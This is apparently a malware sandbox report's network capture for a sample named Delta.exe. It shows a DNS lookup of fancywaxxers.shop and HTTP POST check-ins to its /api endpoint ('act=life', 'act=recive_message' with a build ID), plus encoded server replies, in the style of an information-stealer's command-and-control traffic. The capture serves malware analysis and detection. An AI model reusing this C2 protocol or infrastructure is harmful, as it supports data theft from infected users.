                                                                                        Dec 31, 2024 17:21:14.956257105 CET49730443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:14.956269979 CET44349730104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:14.956558943 CET44349730104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:15.000106096 CET49730443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:15.005577087 CET49730443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:15.005608082 CET49730443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:15.005666971 CET44349730104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:15.444792032 CET44349730104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:15.444885969 CET44349730104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:15.444987059 CET49730443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:15.446499109 CET49730443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:15.446511984 CET44349730104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:15.446553946 CET49730443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:15.446557999 CET44349730104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:15.456770897 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:15.456819057 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:15.456897020 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:15.457180023 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:15.457190037 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:15.933697939 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:15.933779955 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:15.949858904 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:15.949872971 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:15.950099945 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:15.951812983 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:15.951849937 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:15.951877117 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.398931026 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.398994923 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.399024010 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.399063110 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.399099112 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.399136066 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.399153948 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:16.399153948 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:16.399173975 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.399184942 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:16.399504900 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.399550915 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:16.399557114 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.403695107 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.403733969 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.403748035 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:16.403753996 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.403871059 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:16.489353895 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.489531994 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.489562988 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.489658117 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.489660025 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:16.489717960 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:16.489861012 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:16.489872932 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.489882946 CET49731443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:16.489891052 CET44349731104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.654648066 CET49732443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:16.654679060 CET44349732104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:16.654762030 CET49732443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:16.655112028 CET49732443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:16.655122042 CET44349732104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:17.121776104 CET44349732104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:17.121915102 CET49732443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:17.123245955 CET49732443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:17.123253107 CET44349732104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:17.123511076 CET44349732104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:17.124816895 CET49732443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:17.124969959 CET49732443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:17.124998093 CET44349732104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:17.125057936 CET49732443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:17.125063896 CET44349732104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:17.787323952 CET44349732104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:17.787401915 CET44349732104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:17.787447929 CET49732443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:17.787636995 CET49732443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:17.787647963 CET44349732104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:17.877238035 CET49733443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:17.877300024 CET44349733104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:17.877378941 CET49733443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:17.877696037 CET49733443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:17.877713919 CET44349733104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:18.350404978 CET44349733104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:18.350781918 CET49733443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:18.442691088 CET49733443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:18.442724943 CET44349733104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:18.443033934 CET44349733104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:18.447894096 CET49733443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:18.448641062 CET49733443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:18.448676109 CET44349733104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:18.929927111 CET44349733104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:18.930002928 CET44349733104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:18.930063009 CET49733443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:18.930283070 CET49733443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:18.930305958 CET44349733104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:19.159235954 CET49734443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:19.159269094 CET44349734104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:19.159357071 CET49734443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:19.159708977 CET49734443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:19.159715891 CET44349734104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:19.634903908 CET44349734104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:19.635018110 CET49734443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:19.636378050 CET49734443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:19.636384010 CET44349734104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:19.636584044 CET44349734104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:19.637835979 CET49734443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:19.637949944 CET49734443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:19.637968063 CET44349734104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:19.638030052 CET49734443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:19.638035059 CET44349734104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:20.298890114 CET44349734104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:20.298965931 CET44349734104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:20.299091101 CET49734443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:20.299295902 CET49734443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:20.299308062 CET44349734104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:20.617959023 CET49735443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:20.618030071 CET44349735104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:20.618904114 CET49735443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:20.619651079 CET49735443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:20.619668007 CET44349735104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:21.084779024 CET44349735104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:21.084858894 CET49735443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:21.086087942 CET49735443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:21.086100101 CET44349735104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:21.086304903 CET44349735104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:21.087622881 CET49735443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:21.087707043 CET49735443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:21.087712049 CET44349735104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:21.541987896 CET44349735104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:21.542083979 CET44349735104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:21.542140007 CET49735443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:21.542352915 CET49735443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:21.542366982 CET44349735104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:21.983285904 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:21.983342886 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:21.983462095 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:21.983805895 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:21.983825922 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:22.466312885 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:22.466515064 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.468065023 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.468074083 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:22.468327045 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:22.482531071 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.483257055 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.483289003 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:22.483381987 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.483422995 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:22.483534098 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.483572960 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:22.483711004 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.483732939 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:22.483890057 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.483907938 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:22.484077930 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.484097958 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:22.484107018 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.484268904 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.484291077 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.493307114 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:22.493486881 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.493510962 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:22.493535995 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.493547916 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.493670940 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.493696928 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.498631954 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:22.498756886 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:22.498778105 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:24.069005013 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:24.069092035 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:24.069156885 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:24.069369078 CET49736443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:24.069386959 CET44349736104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:24.116734028 CET49737443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:24.116780043 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:24.116867065 CET49737443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:24.117181063 CET49737443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:24.117193937 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:24.584203959 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:24.584266901 CET49737443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:24.585871935 CET49737443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:24.585880995 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:24.586208105 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:24.587620020 CET49737443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:24.587639093 CET49737443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:24.587743044 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:25.028255939 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:25.028299093 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:25.028321981 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:25.028346062 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:25.028373003 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:25.028394938 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:25.028515100 CET49737443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:25.028515100 CET49737443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:25.028538942 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:25.029159069 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:25.029206991 CET49737443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:25.029213905 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:25.032974958 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:25.033003092 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:25.033027887 CET49737443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:25.033034086 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:25.033082962 CET49737443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:25.033087015 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:25.033096075 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:25.033138037 CET49737443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:25.033281088 CET49737443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:25.033293962 CET44349737104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:25.033318043 CET49737443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:25.033324003 CET44349737104.21.96.1192.168.2.4
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 31, 2024 17:21:14.445250034 CET5975753192.168.2.41.1.1.1
                                                                                        Dec 31, 2024 17:21:14.457431078 CET53597571.1.1.1192.168.2.4
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 31, 2024 17:21:14.445250034 CET192.168.2.41.1.1.10x942eStandard query (0)fancywaxxers.shopA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 31, 2024 17:21:14.457431078 CET1.1.1.1192.168.2.40x942eNo error (0)fancywaxxers.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:21:14.457431078 CET1.1.1.1192.168.2.40x942eNo error (0)fancywaxxers.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:21:14.457431078 CET1.1.1.1192.168.2.40x942eNo error (0)fancywaxxers.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:21:14.457431078 CET1.1.1.1192.168.2.40x942eNo error (0)fancywaxxers.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:21:14.457431078 CET1.1.1.1192.168.2.40x942eNo error (0)fancywaxxers.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:21:14.457431078 CET1.1.1.1192.168.2.40x942eNo error (0)fancywaxxers.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:21:14.457431078 CET1.1.1.1192.168.2.40x942eNo error (0)fancywaxxers.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                        • fancywaxxers.shop
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449730104.21.96.14437396C:\Users\user\Desktop\Delta.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:21:15 UTC264OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:21:15 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-12-31 16:21:15 UTC1133INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:21:15 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=jh3iegr0v95naak8liic7scga6; expires=Sat, 26 Apr 2025 10:07:54 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ICAC394gSerGPxQUa8N00ks8f5%2BFPdEcqAdg%2FNd31VPKoRJwr0Y3QGgrxf8opBKHgEvBY2bYw%2FrZQ3GEUG4z06xw%2FR2gf75Lyk4Se9kaouF2OiXQpFFvqNXrOKKqhgmG%2FgZcAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fab9a0118bede9a-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1557&rtt_var=604&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1781574&cwnd=209&unsent_bytes=0&cid=32fe4a71ad5b2d69&ts=518&x=0"
                                                                                        2024-12-31 16:21:15 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                        Data Ascii: 2ok
                                                                                        2024-12-31 16:21:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449731104.21.96.14437396C:\Users\user\Desktop\Delta.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:21:15 UTC265OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 51
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:21:15 UTC51OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 26 6a 3d
                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--914510980&j=
                                                                                        2024-12-31 16:21:16 UTC1135INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:21:16 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=1nt5f9duoedmetb5a09ncdpbc6; expires=Sat, 26 Apr 2025 10:07:55 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5maJoPc47qDEEKYY2paut%2BvNSAfD1yoWtA9a3Hi%2Fe6wHawzC25WD%2FHALJaXgrfSj%2F6aIiXdO98yKKyiW8E3gFiSbbnnZ43g%2BVRJc1wMKATgT8%2BOchil2w0bpbP3TTqOFWkRr8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fab9a070d1b42c0-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1654&rtt_var=634&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=952&delivery_rate=1708601&cwnd=212&unsent_bytes=0&cid=7296eb98da7145a1&ts=472&x=0"
                                                                                        2024-12-31 16:21:16 UTC234INData Raw: 31 63 61 62 0d 0a 54 45 43 65 53 5a 79 32 77 6c 69 47 7a 6e 70 46 4b 4b 71 71 7a 69 39 44 57 32 59 64 68 76 42 63 4d 63 55 44 4d 76 53 63 76 65 30 33 59 75 68 72 70 6f 4c 75 65 76 57 72 57 48 39 63 32 4e 2b 72 41 32 45 36 41 6a 2b 38 6c 6a 31 64 74 6d 59 65 31 75 72 51 7a 33 59 6d 2f 79 58 76 30 2b 35 36 34 37 5a 59 66 33 50 52 69 4b 74 42 59 57 46 45 65 4f 79 53 50 56 32 6e 59 6c 6d 62 37 4e 47 4f 4a 43 7a 35 49 66 6e 56 70 6a 6e 71 6f 78 38 67 54 63 76 41 6f 45 59 75 4d 77 73 2f 71 74 49 35 53 2b 63 35 45 4c 6e 35 79 59 77 42 49 65 30 69 76 73 76 75 49 36 53 72 46 47 63 53 69 4d 75 72 54 53 38 39 41 6e 62 75 6d 44 52 56 70 6d 64 59 68 50 58 62 68 53 51 69 2b 69 44 7a 33 4c 49 30 34 4b 51 55
                                                                                        Data Ascii: 1cabTECeSZy2wliGznpFKKqqzi9DW2YdhvBcMcUDMvScve03YuhrpoLuevWrWH9c2N+rA2E6Aj+8lj1dtmYe1urQz3Ym/yXv0+5647ZYf3PRiKtBYWFEeOySPV2nYlmb7NGOJCz5IfnVpjnqox8gTcvAoEYuMws/qtI5S+c5ELn5yYwBIe0ivsvuI6SrFGcSiMurTS89AnbumDRVpmdYhPXbhSQi+iDz3LI04KQU
                                                                                        2024-12-31 16:21:16 UTC1369INData Raw: 4a 6b 66 4c 69 4f 49 4e 4a 69 46 45 4a 36 54 42 44 46 43 32 63 45 57 62 37 74 6e 50 4d 57 7a 6c 61 2f 6e 59 34 47 4b 6b 70 42 51 70 54 38 76 48 71 30 77 68 4b 77 74 2f 35 35 6f 32 56 36 31 75 58 35 6e 77 31 59 67 6d 4b 2f 73 6b 2b 64 79 6d 4e 65 66 73 56 6d 64 4e 30 49 6a 30 44 51 45 70 42 33 7a 77 6e 79 38 54 75 43 39 4a 31 76 6e 54 7a 33 5a 69 2b 69 58 2f 32 61 41 6f 37 4b 63 54 49 6c 6a 44 77 61 46 41 49 54 51 4f 63 4f 65 53 4f 56 6d 74 62 6c 71 53 38 39 4b 4a 4c 69 4b 38 5a 62 37 54 75 48 71 38 37 44 73 69 57 73 2f 45 75 67 38 62 65 52 73 78 2f 64 49 35 58 2b 63 35 45 4a 37 37 33 49 77 6c 4c 66 38 6a 39 63 61 67 4b 4f 4b 68 48 54 56 4d 7a 63 61 6d 54 6a 4d 7a 43 6e 6e 6e 6d 7a 56 61 6f 6d 5a 55 31 72 43 66 69 44 5a 69 70 47 76 66 32 61 73 32 37 72 73
                                                                                        Data Ascii: JkfLiOINJiFEJ6TBDFC2cEWb7tnPMWzla/nY4GKkpBQpT8vHq0whKwt/55o2V61uX5nw1YgmK/sk+dymNefsVmdN0Ij0DQEpB3zwny8TuC9J1vnTz3Zi+iX/2aAo7KcTIljDwaFAITQOcOeSOVmtblqS89KJLiK8Zb7TuHq87DsiWs/Eug8beRsx/dI5X+c5EJ773IwlLf8j9cagKOKhHTVMzcamTjMzCnnnmzVaomZU1rCfiDZipGvf2as27rs
